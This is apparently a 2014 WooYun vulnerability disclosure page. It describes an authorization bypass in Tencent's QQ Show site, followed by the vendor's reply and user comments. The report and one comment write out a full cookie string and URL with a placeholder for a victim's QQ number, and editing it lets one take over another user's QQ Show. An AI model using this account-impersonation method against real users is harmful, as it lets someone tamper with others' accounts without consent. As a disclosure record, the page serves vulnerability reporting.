漏洞概要
关注数(24)
关注此漏洞
漏洞标题:腾讯QQ秀越权操作可控别人QQ秀
相关厂商:腾讯
漏洞作者: 泳少
提交时间:2014-05-03 14:07
修复时间:2014-06-17 14:08
公开时间:2014-06-17 14:08
漏洞类型:未授权访问/权限绕过
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-05-03: 细节已通知厂商并且等待厂商处理中
2014-05-04: 厂商已经确认,细节仅向厂商公开
2014-05-14: 细节向核心白帽子及相关领域专家公开
2014-05-24: 细节向普通白帽子公开
2014-06-03: 细节向实习白帽子公开
2014-06-17: 细节向公众公开
简要描述:
话说菜刀原来功能这么强大的。我第一次才知道它原来这么腻害的。。哈哈
详细说明:
打开QQ秀官方网站http://show.qq.com/
右击浏览器——扩展功能
登录后的网站。
我就随便找个QQ测试一下 。咱们找肉肉的。。他QQ2928983512
代码pt2gguin=o0这里改成你要登录的QQ号; RK=jq9mYacVWP; ptcz=6caec20a5a6eb59b4d68a0ad0f115538f824fe104e5c23ba41d5b0b8cc8dcbb1; ac=1,014,007; uin_cookie=156498721; euin_cookie=FCE056305C78890DBD4E32329F544F3126CE6F925DA12B85; pgv_pvid=4515140242; pgv_info=ssid=s1163162683; uin=o0这里改成你要登录的QQ号; skey=@m8o7siT9t; ptisp=cnc; session=1; qs_tk=44; ts_last=show.qq.com/; ts_refer=ADTAGclient.im.card.qqshow; ts_uid=5199038500
http://show.qq.com/?ADTAG=client.im.card.qqshow&opuin=这里改成你要登录的QQ号&ptlang=2052#u%3DphotoShow/html/index.html%253Fsex%253DUM%2526rcount%253D0
漏洞证明:
登陆了这个网站后
扩展功能把里面的cookie清空。
然后引用
好了。。。
咱们来给他换个QQ秀
←这个是它刚刚的QQ秀。。现在我给它换了
霸气
修复方案:
版权声明:转载请注明来源 泳少@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2014-05-04 12:25
厂商回复:
非常感谢您的报告。该问题已经通过其它渠道发现并已着手处理。如您有进一步发现,请及时与我们联系。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理。
最新状态:
暂无
漏洞评价:
评论
-
2014-05-03 14:08 |
超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)
-
2014-05-03 14:09 |
魇 ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)
-
2014-05-03 14:11 |
Finger 
( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)
@超威蓝猫 和菜刀无关,改部分cookie及url参数可造成越权
-
2014-05-03 14:15 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2014-05-03 14:19 |
Finger ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)
-
2014-05-03 14:26 |
泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)
-
2014-05-03 14:26 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )
-
2014-05-03 14:26 |
泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)
@魇 拿自己的cookie信息。。然后修改别人的QQ号就完事了
-
2014-05-03 14:29 |
泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)
-
2014-05-03 14:29 |
夏殇 ( 路人 | Rank:30 漏洞数:21 | 不忘初心,方得始终。)
-
2014-05-03 14:29 |
刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)
http://show.qq.com/?ADTAG=client.im.card.qqshow&opuin=这里改成你要登录的QQ号&ptlang=2052#u%3DphotoShow/html/index.html%253Fsex%253DUM%2526rcount%253D0代码pt2gguin=o0这里改成你要登录的QQ号; RK=jq9mYacVWP; ptcz=6caec20a5a6eb59b4d68a0ad0f115538f824fe104e5c23ba41d5b0b8cc8dcbb1; ac=1,014,007; uin_cookie=156498721; euin_cookie=FCE056305C78890DBD4E32329F544F3126CE6F925DA12B85; pgv_pvid=4515140242; pgv_info=ssid=s1163162683; uin=o0这里改成你要登录的QQ号; skey=@m8o7siT9t; ptisp=cnc; session=1; qs_tk=44; ts_last=show.qq.com/; ts_refer=ADTAGclient.im.card.qqshow; ts_uid=5199038500
-
2014-05-03 14:30 |
冷少 ( 路人 | Rank:14 漏洞数:4 | 专注网络安全,广交各地盆友~)
-
2014-05-03 14:33 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )
-
2014-05-03 14:42 |
M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)
呵呵…http://www.qqyewu.com/soft/2/2014/201405039990.html教程
-
2014-05-03 14:43 |
泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)
-
2014-05-03 14:45 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )
@M4sk 大牛, 你是X组的m4sk吗?这么屌!
-
2014-05-03 14:53 |
刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)
-
2014-05-03 14:58 |
泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)
@疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 @疯狗 求审核漏洞
-
2014-05-03 15:00 |
Ares ( 路人 | Rank:29 漏洞数:8 | 来自幼儿园大班)
先手很快啊。。。早就看到这漏洞了。。还有人用他社黑轮,哈哈。。@M4sk兄,好久不见
-
2014-05-03 15:11 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )
-
2014-05-03 15:25 |
07@jyhack.com ( 路人 | Rank:14 漏洞数:10 | 希望和大家多多交流,多多沟通、)
-
2014-05-03 15:27 |
Ares ( 路人 | Rank:29 漏洞数:8 | 来自幼儿园大班)
-
2014-05-03 15:31 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
-
2014-05-03 15:33 |
不进则退 ( 路人 | Rank:2 漏洞数:1 | 慢慢成长,不进则退。)
-
2014-05-03 16:04 |
破锁 ( 路人 | Rank:23 漏洞数:6 )
-
2014-05-03 16:06 |
破锁 ( 路人 | Rank:23 漏洞数:6 )
-
2014-05-03 16:21 |
小怿 ( 路人 | Rank:29 漏洞数:6 | )
幸亏我没女朋友,要有可坏事了。。我一朋友是红钻,结果刚才他在空间各种给他媳妇解释他的Q秀上面的照片秀。。我还以为秀恩爱呢,上去回了一句“秀恩爱死的快”,结果现在他给我拉黑了!!!!!
-
2014-05-03 16:34 |
′ 蜗牛 ( 路人 | Rank:7 漏洞数:5 | 人外有人,天外有天,低调做人,低调做事。)
-
2014-05-03 17:18 |
letboy ( 路人 | Rank:26 漏洞数:33 | 其实学点技术比较实在!)
-
2014-05-03 17:32 |
YHHK ( 路人 | Rank:22 漏洞数:5 | love hacker!love technology!)
改个cookies嘛。。。菜刀个JB。。。一看就是被人玩剩下的,菜刀是毛重点
-
2014-05-03 17:52 |
破锁 ( 路人 | Rank:23 漏洞数:6 )
@小怿 不该去刺激人家的 你得演示给他们看 帮他把女朋友搞回来 他会谢你的!
-
2014-05-03 18:06 |
小怿 ( 路人 | Rank:29 漏洞数:6 | )
@破锁 我也想演示,但是我电脑只有他媳妇的照片,你说我当时能演示吗。。
-
2014-05-03 19:12 |
破锁 ( 路人 | Rank:23 漏洞数:6 )
@小怿 直接美图秀秀 P上字 XXX ,XXX喜欢你………………这个是傻逼干的! 你懂得 然后你朋友会请吃哦!
-
2014-05-03 19:24 |
M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)
-
2014-05-03 19:26 |
浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )
-
2014-05-03 19:50 |
M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)
-
2014-06-17 14:10 |
1fn0 ( 路人 | Rank:21 漏洞数:7 | 我是运维 不要开除我)
-
2014-06-17 19:40 |
灭亡 ( 路人 | Rank:8 漏洞数:5 | 乌云打杂 偶尔发几个垃圾洞刷存在 qq83133...)
